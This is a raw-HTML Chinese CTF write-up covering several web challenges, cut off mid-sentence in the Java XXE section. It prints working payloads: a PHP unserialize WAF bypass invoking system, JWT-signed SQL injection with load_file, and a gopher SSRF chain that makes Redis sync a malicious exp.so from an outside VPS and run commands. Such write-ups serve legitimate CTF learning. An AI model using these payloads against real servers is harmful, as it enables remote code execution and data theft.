src="https://wechat2rss.xlab.app/img-proxy/?k=46f13372&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGHqYmy1EaL4fib3o1t0CQUEicCM9C9QuAH3Cajw4K0Ash6lGJMThRlNbQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">对时间页抓包可以看到两个参数：<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">func=date&amp;p=Y-m-d+h%3Ai%3As+a</code>，猜测存在RCE，但是执行代码/命令的函数基本都被WAF了</p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.31833333333333336" data-s="300,640" style="" data-type="png" data-w="1200" src="https://wechat2rss.xlab.app/img-proxy/?k=d99a959b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGc5Hf2WlcNSJjotl7dBBvrrHYSfU64T8nNh3lBs76nDu9drFvCHlgpg%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">fuzz发现<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">file_get_contents</code>可用，用它把index.php下载下来</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">func=file_get_contents&amp;p=index.php</code><span style="font-size: 0px;"></span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.228125" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=a4226125&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksG4Jr4PXVeTDeEib6dUlKBhzGAE2sxIqG7Vyh1tfFBrEce2x67DduB1Cg%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">通过<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">in_array($func,$disable_fun)</code>卡了很多敏感函数，但是还漏了用于反序列化的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">unserialize</code>，于是就可以通过序列化后的Payload来绕过WAF</p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;"><span style="box-sizing: border-box;color: rgb(34, 134, 58);">&lt;?php</span><br/><span style="box-sizing: border-box;color: rgb(215, 58, 73);">class</span> <span style="box-sizing: border-box;color: rgb(227, 98, 9);">Test</span> {<br/>    <span style="box-sizing: border-box;color: rgb(215, 58, 73);">public</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);"><span style="box-sizing: border-box;">$</span>p</span>;<br/>    <span style="box-sizing: border-box;color: rgb(215, 58, 73);">public</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);"><span style="box-sizing: border-box;">$</span>func</span>;<br/>}<br/><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>a</span> = <span style="box-sizing: border-box;color: rgb(215, 58, 73);">new</span> <span style="box-sizing: border-box;color: rgb(227, 98, 9);">Test</span>();<br/><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>a</span>-&gt;<span style="box-sizing: border-box;color: rgb(0, 92, 197);">func</span> = <span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;system&#34;</span>;<br/><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>a</span>-&gt;<span style="box-sizing: border-box;color: rgb(0, 92, 197);">p</span> = <span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;ls -al /&#34;</span>;<br/><span style="box-sizing: border-box;color: rgb(215, 58, 73);">echo</span> <span style="box-sizing: border-box;color: rgb(111, 66, 193);">urlencode</span>(<span style="box-sizing: border-box;color: rgb(111, 66, 193);">serialize</span>(<span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>a</span>));<br/><span style="box-sizing: border-box;color: rgb(106, 115, 125);"># func=unserialize&amp;p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A8%3A%22ls+-al+%2F%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D</span></pre><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">或者利用形如<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">\system</code>的命名空间形式绕过WAF</p><h2 style="box-sizing: border-box;margin-top: 24px;margin-bottom: 16px;font-weight: 600;font-size: 1.5em;line-height: 1.25;padding-bottom: 0.3em;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><svg viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg>js_on</h2><p style="text-align: left;">考察PHP的JWT签名后绕WAF注入<br/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.778169014084507" data-s="300,640" style="" data-type="png" data-w="1136" src="https://wechat2rss.xlab.app/img-proxy/?k=ebc10506&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGKoUCACaNEeAJsArX5bsGfPicLM0M8lHqtia7gXnj3qlHialAdicExXmEWQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">开局一个表单，顺手<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">admin,admin</code>就进去了，拿到一个key<span style="font-size: 0px;"></span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.21686746987951808" data-s="300,640" style="" data-type="png" data-w="1162" src="https://wechat2rss.xlab.app/img-proxy/?k=6f7d4898&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksG41vib8tGvwV3EGDSkhFc62EfBq85BKRqc6o3SGtY0LJonbCXmKBqOnQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">回头来试注入会被问候到。。。就不贴图了</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">利用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">&lt;&gt;</code>置空特性和JWT的key签名后绕过WAF注入，表里没东西直接<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">load_file</code>读根目录下的flag，再贴一个自己撸的辣鸡脚本</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//github.com/hosch3n/expload/blob/master/PHP-Tricks/js_on.py</span></span></code></pre></section><h2 style="box-sizing: border-box;margin-top: 24px;margin-bottom: 16px;font-weight: 600;font-size: 1.5em;line-height: 1.25;padding-bottom: 0.3em;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><svg viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg>ssrfme</h2><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">考察PHP的SSRF绕过IP限制后，利用gopher协议打Redis授权后的主从同步RCE</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">给了源码，提示本地访问<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">hint.php</code></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">开头限制了协议只能是<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">http|https|gopher|dict</code>中的，然后卡了一下本地和内网IP，考虑到参赛队数量估计没有更深的内网环境<span style="font-size: 0px;"></span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.6271739130434782" data-s="300,640" style="" data-type="png" data-w="920" src="https://wechat2rss.xlab.app/img-proxy/?k=12f14c06&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGKd2Qibuyvxyp96eSCnnAg0Zn02SiaTAabzycIh76eVGdAPkto2Pcibtaw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">先利用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">?url=<a href="http://foo@127.0.0.1:80@x.x/hint.php" target="_blank">http://foo@127.0.0.1:80@x.x/hint.php</a></code>绕过IP限制（进制转换、0.0.0.0、DNS重绑定等也可以），看到提示的Redis密码为<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">welcometowangdingbeissrfme6379</code></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">之后的思路就是利用gopher协议打需要认证的6379端口上的Redis，使其作为从机访问搭建了<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">Rogue-MySql-Server</code>的VPS，将VPS上编译好的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">exp.so</code>拓展同步到目标上（俗称Redis主从同步RCE），这样就能直接利用Redis执行系统命令了，赛题环境弹shell总是抽风，所以直接执行<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">cat</code>通过Web端回显读到了flag</p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;font-size: 13.6px;background-color: rgb(246, 248, 250);overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;border-radius: 3px;word-break: normal;color: rgb(36, 41, 46);text-align: start;"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;font-size: 13.6px;background: transparent;border-radius: 3px;word-break: normal;border-width: 0px;border-style: initial;border-color: initial;display: inline;overflow: visible;line-height: inherit;overflow-wrap: normal;"><span style="box-sizing: border-box;color: rgb(153, 153, 153);font-weight: bold;">&lt;?php</span><br/><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">if</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;color: rgb(0, 128, 128);">$_SERVER</span><span style="box-sizing: border-box;">[</span><span style="box-sizing: border-box;color: rgb(221, 17, 68);">&#39;REMOTE_ADDR&#39;</span><span style="box-sizing: border-box;">]</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">===</span><span style="box-sizing: border-box;color: rgb(221, 17, 68);">&#34;127.0.0.1&#34;</span><span style="box-sizing: border-box;">){</span><br/>  <span style="box-sizing: border-box;color: rgb(0, 134, 179);">highlight_file</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">__FILE__</span><span style="box-sizing: border-box;">);</span><br/><span style="box-sizing: border-box;">}</span><br/><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">if</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;color: rgb(0, 134, 179);">isset</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;color: rgb(0, 128, 128);">$_POST</span><span style="box-sizing: border-box;">[</span><span style="box-sizing: border-box;color: rgb(221, 17, 68);">&#39;file&#39;</span><span style="box-sizing: border-box;">])){</span><br/>  <span style="box-sizing: border-box;color: rgb(0, 134, 179);">file_put_contents</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;color: rgb(0, 128, 128);">$_POST</span><span style="box-sizing: border-box;">[</span><span style="box-sizing: border-box;color: rgb(221, 17, 68);">&#39;file&#39;</span><span style="box-sizing: border-box;">],</span><span style="box-sizing: border-box;color: rgb(221, 17, 68);">&#34;&lt;?php echo &#39;welcometowangdingbeissrfme6379 is root&#39;;exit();&#34;</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">.</span><span style="box-sizing: border-box;color: rgb(0, 128, 128);">$_POST</span><span style="box-sizing: border-box;">[</span><span style="box-sizing: border-box;color: rgb(221, 17, 68);">&#39;file&#39;</span><span style="box-sizing: border-box;">]);</span><br/><span style="box-sizing: border-box;">}</span></code></pre><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">这里由于目前还没有方便的复现环境，所以就只贴一下Payload，不再干巴巴地多讲了，等CTFHub上了环境再补齐细节吧（表哥五毛拿来 $.$）<br/></p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;margin-bottom: 16px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;color: rgb(36, 41, 46);text-align: start;"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;background: initial;border-radius: 3px;word-break: normal;border-width: 0px;border-style: initial;border-color: initial;display: inline;overflow: visible;line-height: inherit;overflow-wrap: normal;">?url=<a href="http://foo@127.0.0.1:80@x.x/hint.php" target="_blank">http://foo@127.0.0.1:80@x.x/hint.php</a><br/>?url=gopher://a@127.0.0.1:6379@x.x/_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%252430%250D%250Awelcometowangdingbeissrfme6379%250D%250A%252A3%250D%250A%25247%250D%250ASLAVEOF%250D%250A%252413%250D%250A1.1.1.1%250D%250A%25244%250D%250A7777%250D%250A%252A4%250D%250A%25246%250D%250ACONFIG%250D%250A%25243%250D%250ASET%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2Ftmp%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25246%250D%250AMODULE%250D%250A%25244%250D%250ALOAD%250D%250A%252411%250D%250A%2Ftmp%2Fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252435%250D%250Acat%2524%257BIFS%257D%2FflagFlagFLLLLLLLLLLLLLLag%250D%250A%252A1%250D%250A%25244%250D%250APOST%250D%250A</code></pre><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">同时安利一下用到的工具：</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">redis-ssrf</span></code><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//github.com/xmsec/redis-ssrf</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">redis-rogue-server</span></code><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//github.com/n0b0dyCN/redis-rogue-server</span></span></code></pre></section><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">让<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">ssrf-redis.py</code>的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">mode=3</code>，<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">lhost</code>和<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">lport</code>填VPS上<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">rogue-server.py</code>监听的地址，同时将编译好的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">exp.so</code>和<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">rogue-server.py</code>放在VPS的同一目录下，最后将生成的Payload二次编码后，通过<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">?url=</code>参数打过去即可，执行的命令会在Web前端回显回来</p><h2 style="box-sizing: border-box;margin-top: 24px;margin-bottom: 16px;font-weight: 600;font-size: 1.5em;line-height: 1.25;padding-bottom: 0.3em;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">FileJava</h2><p style="text-align: left;">考察Java的poi xml解析库XXE<br/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.6438026474127557" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=de0ee134&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGvQesSricZA2Ua3c1wFMIS3fObAicN9lUHicm1cqTHLnDVFPWuEX8JKSYw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">直接访问是一个上传表单，上传任意文件后可以得到下载接口：<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/file_in_java/DownloadServlet?filename=</code><span style="font-size: 0px;"></span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.6312785388127854" data-s="300,640" style="" data-type="png" data-w="876" src="https://wechat2rss.xlab.app/img-proxy/?k=56b18b0d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksG5MBusy7r5Mn768Vz1ackdI6REZ5Uc6DeMDfJuLUgCOSiahmuPASqxsA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">在CTFHub复盘时，尝试利用路径穿越下载<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/etc/passwd</code>和<code style="box-sizing: 